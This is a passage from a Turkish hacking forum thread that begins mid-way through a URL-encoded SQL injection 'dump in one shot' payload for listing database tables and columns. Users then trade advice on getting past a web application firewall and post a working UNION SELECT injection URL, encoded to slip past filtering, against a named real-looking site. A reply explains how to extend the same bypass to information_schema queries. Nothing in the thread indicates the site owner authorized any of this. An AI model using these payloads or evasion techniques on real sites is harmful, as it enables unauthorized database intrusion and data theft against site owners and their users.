columns%29where%28table_name=@tbl%29%29,0x5d202f203c666f6e7420636f6c6f723d79656c6c6f773e205265636f726473203a204c6970726f772044494f537e205b,%28Select+ifnull%28table_rows,0x30%29+from+information_schema.tables+where+table_name=@tbl%29,0x5d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e%29,0x00%29,concat%280x3c646976207374796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,LPAD%28@col_nr:=@col_nr%2b1,3,0x0b%29,0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e%29%29%29%29%29x%29,0x3c2f6469763e%29
çift tırnak attığımda kolonların yerlerini otomatik gösteriyor lakin ilerisine gitmeye çalıştığımda beni wap koruması karşılıyor sizin kodunuzu denedim dediğiniz yerlerden işlem yaptım onda da farklı sayfaya yönlendirdi yine kolon sayısını gösteriyor fakat ondan ilerisine gitmiyor ben bir yerde büyük ihtimalle bir şey kaçırıyorum ama tam çözemedim kaçırdığım yeri (en son contact us bölümüne geldiğimizde oradaki kolon sayısının 60 olduğunu görüyorum ama yine ilerisine gidemiyorum)
site:
https://sayegh.co.il/index.php?todo=cat_page_ceramic&id=-333' +and+0+ U%6e%69%6fn S%65%6c%65%63t 1,2,3,4,5,concat("Pes etmediğin sürece sorun yok."),7,8,9,10 -- -&lang=heb
Hayır.abi kendin yazdığın dios mu ?
abi bu union bypass hackbarda yok değil mi nereden buluyorsun kendin mi bypass payloadı yaziyorsunKod:https://sayegh.co.il/index.php?todo=cat_page_ceramic&id=-333' +and+0+ U%6e%69%6fn S%65%6c%65%63t 1,2,3,4,5,concat("Pes etmediğin sürece sorun yok."),7,8,9,10 -- -&lang=heb
Hayır.
tamam abi teşekkürler.bypass denilen kavramın %80'i senin yorum kabiliyetine bağlı bir şey bunu sadece unıon kısmına da indirgeme. "U%6e%69%6fn" burada tam anlamıyla bir bypass da yok aslında, kullandığın hackbar'da %URL şeklinde bir ibare vardır elbet. Burada önemli olan reactive bölümlerin yorumlanmasına olanak tanıması. Bu ne demek dersen mesela union kısmını url encode şekilde wafı atladığımıza göre ınformatıon_schema bölümünde de aynı şekilde bypass uygulaya biliriz vs vs. İşin derinine inmek istiyorsan da %20 lik kısım veritabanı türlerini kapsıyor.
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.